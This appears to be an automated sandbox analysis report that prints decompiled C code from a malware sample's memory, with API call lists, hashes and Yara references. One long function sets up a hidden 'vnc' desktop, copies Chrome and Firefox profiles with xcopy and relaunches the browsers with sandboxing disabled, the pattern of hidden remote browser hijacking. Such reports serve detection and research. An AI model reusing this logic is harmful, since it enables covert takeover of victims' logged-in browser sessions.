                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004032E6(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00401052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E004036F7(_t14,  &_v1028); // executed
				return _t14;
			}






                                  0x004032ff
                                  0x00403301
                                  0x00403303
                                  0x00403319
                                  0x00403328
                                  0x00403332

                                  APIs
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                  • String ID:
                                  • API String ID: 1709970682-0
                                  • Opcode ID: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                  • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                  • Opcode Fuzzy Hash: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                  • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004125DF, Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004125DF(void** __ecx, short** _a4, char** _a8, int _a12) {
				long _t8;
				void* _t13;

				_t13 =  *__ecx;
				if(_t13 == 0) {
					L3:
					return 0;
				}
				_t8 = RegSetValueExW(_t13,  *_a4, 0, _a12,  *_a8, _a8[1]); // executed
				if(_t8 != 0) {
					goto L3;
				}
				return _t8 + 1;
			}





                                  0x004125e3
                                  0x004125e7
                                  0x0041260b
                                  0x00000000
                                  0x0041260b
                                  0x004125fe
                                  0x00412606
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 725edb401eb3285b3aade53387efa27f2a736d8688efe74a972a861434cd0a44
                                  • Instruction ID: 82cc8a580631751598ccbc2721819c589a0b77c802dca66c40913ee06865ecb6
                                  • Opcode Fuzzy Hash: 725edb401eb3285b3aade53387efa27f2a736d8688efe74a972a861434cd0a44
                                  • Instruction Fuzzy Hash: AFE04F31205214AFDB00CF54CD84EEB77A8EF49750B14C05AF905DB360D2B1EC61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A23, Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00405A23(void* __ecx, void* __eflags) {

				E004032D5(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E004117B7(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}



                                  0x00405a27
                                  0x00405a2e
                                  0x00405a31
                                  0x00405a3b
                                  0x00405a3e
                                  0x00405a41
                                  0x00405a4c
                                  0x00405a52
                                  0x00405a58
                                  0x00405a5b
                                  0x00405a60

                                  APIs
                                    • Part of subcall function 004117B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutexStartup
                                  • String ID:
                                  • API String ID: 3730780901-0
                                  • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                  • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004112C4, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004112C4(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00403237(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}




                                  0x004112cc
                                  0x004112d1
                                  0x004112e5
                                  0x004112ed

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventlstrcat
                                  • String ID:
                                  • API String ID: 2275612694-0
                                  • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                  • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117B7, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004117B7(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}





                                  0x004117ba
                                  0x004117bf
                                  0x004117c7
                                  0x004117d1
                                  0x004117d5

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                  • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412554, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412554(void** __ecx) {
				long _t1;
				signed int* _t3;

				_t3 = __ecx;
				if( *__ecx != 0) {
					_t1 = RegCloseKey( *__ecx); // executed
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t1;
			}





                                  0x00412555
                                  0x0041255a
                                  0x0041255e
                                  0x0041255e
                                  0x00412564
                                  0x00412568

                                  APIs
                                  • RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                  • Instruction ID: 9d8d642a2df10e52aa6db1d194c77715a7231d9df8bfeebc40ec518d9b126583
                                  • Opcode Fuzzy Hash: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                  • Instruction Fuzzy Hash: 13C04C31014221DBD7355F14E4047D57BF5AB05352F25046E90C055164E7B509D0CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410C3E, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                  Download Yara Rule
                                  APIs
                                  • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                  • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F68, Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405F68(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00406077(_t8, _t7);
				return _t8;
			}






                                  0x00405f71
                                  0x00405f76
                                  0x00405f7c
                                  0x00405f81
                                  0x00405f8b

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                  • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409733, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409733(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}





                                  0x00409733
                                  0x00409738
                                  0x00405ff3
                                  0x00405ff9
                                  0x0040973e
                                  0x0040973e
                                  0x0040973e

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                  • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FFA, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405FFA(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}




                                  0x00406004
                                  0x0040600a

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                  • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FEB, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405FEB(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}




                                  0x00405ff3
                                  0x00405ff9

                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                  • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00413695, Relevance: 84.6, APIs: 28, Strings: 20, Instructions: 624processsynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00413695(void* __ecx, void* __eflags, WCHAR* _a4) {
				WCHAR* _v12;
				int _v16;
				WCHAR* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				struct _SECURITY_ATTRIBUTES* _v50;
				struct _SECURITY_ATTRIBUTES* _v54;
				struct _SECURITY_ATTRIBUTES* _v58;
				struct _SHFILEOPSTRUCTW _v76;
				long _v80;
				struct _PROCESS_INFORMATION _v96;
				struct _PROCESS_INFORMATION _v112;
				struct _STARTUPINFOW _v184;
				struct _STARTUPINFOW _v256;
				short _v776;
				short _v1296;
				WCHAR* _t170;
				WCHAR* _t176;
				void* _t178;
				void* _t179;
				void* _t187;
				void* _t289;
				long _t354;
				WCHAR* _t355;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				signed int _t474;
				void* _t485;
				WCHAR* _t486;
				void* _t491;
				WCHAR* _t494;

				_t354 = 0x44;
				E00401052( &_v184, 0, _t354);
				_v184.cb = _t354;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t170 = L"vnc";
				_v184.lpDesktop = _t170;
				CreateDesktopW(_t170, 0, 0, 0, 0x10000000, 0);
				E00401052( &_v1296, 0, 0x208);
				if(E00403373( &_a4) != 0) {
					_t176 = CharLowerW(PathFindFileNameW(_a4));
					_t355 = _a4;
				} else {
					_v16 = 0x104;
					AssocQueryStringW(0, 2, L"http", L"open",  &_v1296,  &_v16);
					_t176 = CharLowerW(PathFindFileNameW( &_v1296));
					_t355 =  &_v1296;
				}
				_t482 = _t176;
				_v32 = _t355;
				if(E00401144(_t176, L"chrome.exe") != 0) {
					_t178 = E00401144(_t482, L"firefox.exe");
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = E00401144(_t482, L"iexplore.exe");
						__eflags = _t179;
						_push( &_v96);
						_push( &_v184);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						if(_t179 != 0) {
							CreateProcessW(_a4, ??, ??, ??, ??, ??, ??, ??, ??, ??);
							_t474 = _v96.dwProcessId;
							goto L16;
						}
						CreateProcessW(_t355, ??, ??, ??, ??, ??, ??, ??, ??, ??);
						_push(0xfffffffd);
						goto L14;
					}
					_t187 = E00412155(E004036F7( &_v16, L"firefox.exe"));
					E00405FEB(_v16);
					_t474 = 0xffffffff;
					_push(0x208);
					__eflags = _t187;
					if(_t187 == 0) {
						_push(0);
						_push( &_v776);
						E00401052();
						_t467 = 0x28;
						E00410C8A( &_v20, _t467, __eflags);
						E0040373F( &_v12,  &_v20);
						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
						E00405FEB(_v44);
						E0040373F( &_v16,  &_v12);
						E0040357C( &_v16, _t467, __eflags, L"profiles.ini");
						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v16);
						E0040357C( &_v12, _t467, __eflags,  &_v776);
						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\prefs.js"));
						E00405FEB(_v44);
						_t485 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
						WriteFile(_t485, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
						CloseHandle(_t485);
						CreateProcessW(_t355, 0, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E00405FEB(_v16);
						E00405FEB(_v12);
						E00405FEB(_v20);
					} else {
						_push(0);
						_push( &_v776);
						E00401052();
						_t468 = 0x28;
						E00410C8A( &_v16, _t468, __eflags);
						E0040373F( &_v32,  &_v16);
						E00403447( &_v32, __eflags, E004036F7( &_v20, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
						E00405FEB(_v20);
						E0040373F( &_v12,  &_v16);
						E00403447( &_v12, __eflags, E004036F7( &_v20, L"\\AppData\\Roaming\\FirefoxBackup"));
						E00405FEB(_v20);
						_t486 = _v12;
						_v76.fFlags = 0x414;
						_v76.hwnd = 0;
						_v76.wFunc = 3;
						_v76.pFrom = _t486;
						_v76.pTo = 0;
						_v58 = 0;
						_v50 = 0;
						_v54 = 0;
						SHFileOperationW( &_v76);
						CreateDirectoryW(_t486, 0);
						E0040373F( &_v36,  &_v32);
						E0040357C( &_v36, _t468, __eflags, L"profiles.ini");
						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v36);
						E0040373F( &_v40,  &_v32);
						E0040357C( &_v40, _t468, __eflags,  &_v776);
						E004036F7( &_v24, L"xcopy.exe /H /Y /E /C ");
						E00403447(E004033D1( &_v24, _t468, __eflags, "\""), __eflags,  &_v40);
						E00403447(E004033D1(E004033D1(E004033D1(_t244, _t468, __eflags, "\""), _t468, __eflags, " "), _t468, __eflags, "\""), __eflags,  &_v12);
						E004033D1(_t249, _t468, __eflags, "\"");
						_t469 = 0x25;
						E00410C8A( &_v20, _t469, __eflags);
						E00403447( &_v20, __eflags, E004036F7( &_v44, L"\\xcopy.exe"));
						E00405FEB(_v44);
						E00401052( &_v256, 0, 0x44);
						CreateProcessW(_v20, _v24, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
						WaitForSingleObject(_v112.hProcess, 0xffffffff);
						E004036F7( &_v28, "\"");
						E00403447(E004033D1(E004033D1(E0040357C( &_v28, _t469, __eflags, _t355), _t469, __eflags, "\""), _t469, __eflags, "-no-remote -profile \""), __eflags,  &_v12);
						E004033D1(_t266, _t469, __eflags, "\"");
						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\prefs.js"));
						E00405FEB(_v44);
						_t491 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
						WriteFile(_t491, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
						CloseHandle(_t491);
						CreateProcessW(_t355, _v28, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E00405FEB(_v28);
						_v28 = 0;
						E00405FEB(_v20);
						E00405FEB(_v24);
						_v24 = 0;
						E00405FEB(_v40);
						E00405FEB(_v36);
						E00405FEB(_v12);
						E00405FEB(_v32);
						E00405FEB(_v16);
						_t474 = CreateProcessW | 0xffffffff;
					}
					goto L16;
				} else {
					_t289 = E00412155(E004036F7( &_v16, L"chrome.exe"));
					E00405FEB(_v16);
					_t505 = _t289;
					if(_t289 == 0) {
						E004036F7( &_v20, "\"");
						E004033D1(E004033D1(E0040357C( &_v20, _t466, __eflags, _t355), _t466, __eflags, "\""), _t466, __eflags, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11");
						CreateProcessW(_t355, _v20, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
					} else {
						_t470 = 0x28;
						E00410C8A( &_v20, _t470, _t505);
						E0040373F( &_v40,  &_v20);
						E00403447( &_v40, _t505, E004036F7( &_v16, L"\\AppData\\Local\\Google\\Chrome\\User Data"));
						E00405FEB(_v16);
						E0040373F( &_v12,  &_v20);
						E00403447( &_v12, _t505, E004036F7( &_v16, L"\\AppData\\Local\\GoogleBackup"));
						E00405FEB(_v16);
						_t494 = _v12;
						_v76.fFlags = 0x414;
						_v76.hwnd = 0;
						_v76.wFunc = 3;
						_v76.pFrom = _t494;
						_v76.pTo = 0;
						_v58 = 0;
						_v50 = 0;
						_v54 = 0;
						SHFileOperationW( &_v76);
						CreateDirectoryW(_t494, 0);
						E004036F7( &_v28, L"xcopy.exe /H /Y /E /C ");
						E00403447(E004033D1( &_v28, _t470, _t505, "\""), _t505,  &_v40);
						E00403447(E004033D1(E004033D1(E004033D1(_t315, _t470, _t505, "\""), _t470, _t505, " "), _t470, _t505, "\""), _t505,  &_v12);
						E004033D1(_t320, _t470, _t505, "\"");
						_t471 = 0x25;
						E00410C8A( &_v36, _t471, _t505);
						E00403447( &_v36, _t505, E004036F7( &_v16, L"\\xcopy.exe"));
						E00405FEB(_v16);
						E00401052( &_v256, 0, 0x44);
						CreateProcessW(_v36, _v28, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
						WaitForSingleObject(_v112, 0xffffffff);
						E004036F7( &_v24, "\"");
						E00403447(E004033D1(E004033D1(E0040357C( &_v24, _t471, _t505, _v32), _t471, _t505, "\""), _t471, _t505, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\""), _t505,  &_v12);
						E004033D1(_t337, _t471, _t505, "\"");
						CreateProcessW(_v32, _v24, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E00405FEB(_v24);
						_v24 = 0;
						E00405FEB(_v36);
						E00405FEB(_v28);
						_v28 = 0;
						E00405FEB(_t494);
						E00405FEB(_v40);
					}
					E00405FEB(_v20);
					_push(0xfffffffe);
					L14:
					_pop(_t474);
					L16:
					E00405FEB(_a4);
					return _t474;
				}
			}










































                                  0x004136a3
                                  0x004136ae
                                  0x004136b5
                                  0x004136c1
                                  0x004136c2
                                  0x004136c3
                                  0x004136c4
                                  0x004136c5
                                  0x004136cc
                                  0x004136dc
                                  0x004136ef
                                  0x00413701
                                  0x0041374e
                                  0x00413754
                                  0x00413703
                                  0x00413706
                                  0x00413722
                                  0x00413736
                                  0x0041373c
                                  0x0041373c
                                  0x00413757
                                  0x00413759
                                  0x0041376b
                                  0x004139df
                                  0x004139e6
                                  0x004139e8
                                  0x00413df2
                                  0x00413df9
                                  0x00413dfe
                                  0x00413e05
                                  0x00413e06
                                  0x00413e07
                                  0x00413e08
                                  0x00413e09
                                  0x00413e0a
                                  0x00413e0b
                                  0x00413e0c
                                  0x00413e0d
                                  0x00413e1e
                                  0x00413e24
                                  0x00000000
                                  0x00413e24
                                  0x00413e10
                                  0x00413e16
                                  0x00000000
                                  0x00413e16
                                  0x004139fd
                                  0x00413a07
                                  0x00413a0c
                                  0x00413a15
                                  0x00413a1a
                                  0x00413a1c
                                  0x00413cdf
                                  0x00413ce0
                                  0x00413ce1
                                  0x00413cee
                                  0x00413cef
                                  0x00413cfb
                                  0x00413d11
                                  0x00413d19
                                  0x00413d25
                                  0x00413d32
                                  0x00413d51
                                  0x00413d61
                                  0x00413d77
                                  0x00413d7f
                                  0x00413d9c
                                  0x00413daa
                                  0x00413db1
                                  0x00413dcc
                                  0x00413dd5
                                  0x00413ddd
                                  0x00413de5
                                  0x00413a22
                                  0x00413a24
                                  0x00413a25
                                  0x00413a26
                                  0x00413a33
                                  0x00413a34
                                  0x00413a40
                                  0x00413a56
                                  0x00413a5e
                                  0x00413a6a
                                  0x00413a80
                                  0x00413a88
                                  0x00413a8d
                                  0x00413a95
                                  0x00413a9d
                                  0x00413aa0
                                  0x00413aa7
                                  0x00413aaa
                                  0x00413aad
                                  0x00413ab0
                                  0x00413ab3
                                  0x00413ab6
                                  0x00413abe
                                  0x00413acb
                                  0x00413ad8
                                  0x00413af7
                                  0x00413b04
                                  0x00413b13
                                  0x00413b20
                                  0x00413b3b
                                  0x00413b64
                                  0x00413b6c
                                  0x00413b73
                                  0x00413b77
                                  0x00413b8d
                                  0x00413b95
                                  0x00413ba6
                                  0x00413bcf
                                  0x00413bd6
                                  0x00413be4
                                  0x00413c12
                                  0x00413c1e
                                  0x00413c34
                                  0x00413c3c
                                  0x00413c5b
                                  0x00413c69
                                  0x00413c70
                                  0x00413c8d
                                  0x00413c92
                                  0x00413c9a
                                  0x00413c9d
                                  0x00413ca5
                                  0x00413cad
                                  0x00413cb0
                                  0x00413cb8
                                  0x00413cc0
                                  0x00413cc8
                                  0x00413cd0
                                  0x00413cd5
                                  0x00413cd5
                                  0x00000000
                                  0x00413771
                                  0x00413780
                                  0x0041378a
                                  0x00413792
                                  0x00413794
                                  0x00413989
                                  0x004139aa
                                  0x004139c4
                                  0x0041379a
                                  0x0041379c
                                  0x0041379d
                                  0x004137a9
                                  0x004137bf
                                  0x004137c7
                                  0x004137d3
                                  0x004137e9
                                  0x004137f1
                                  0x004137f6
                                  0x004137fe
                                  0x00413806
                                  0x00413809
                                  0x00413810
                                  0x00413813
                                  0x00413816
                                  0x00413819
                                  0x0041381c
                                  0x0041381f
                                  0x00413827
                                  0x00413835
                                  0x00413850
                                  0x00413879
                                  0x00413881
                                  0x00413888
                                  0x0041388c
                                  0x004138a2
                                  0x004138aa
                                  0x004138bb
                                  0x004138e4
                                  0x004138eb
                                  0x004138f9
                                  0x00413929
                                  0x00413935
                                  0x00413953
                                  0x00413958
                                  0x00413960
                                  0x00413963
                                  0x0041396b
                                  0x00413972
                                  0x00413975
                                  0x0041397d
                                  0x0041397d
                                  0x004139cd
                                  0x004139d2
                                  0x00413e18
                                  0x00413e18
                                  0x00413e27
                                  0x00413e2a
                                  0x00413e35
                                  0x00413e35

                                  APIs
                                  • CreateDesktopW.USER32 ref: 004136DC
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • AssocQueryStringW.SHLWAPI(00000000,00000002,http,open,?,00000000), ref: 00413722
                                  • PathFindFileNameW.SHLWAPI(?), ref: 0041372F
                                  • CreateProcessW.KERNEL32(00413672,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004138E4
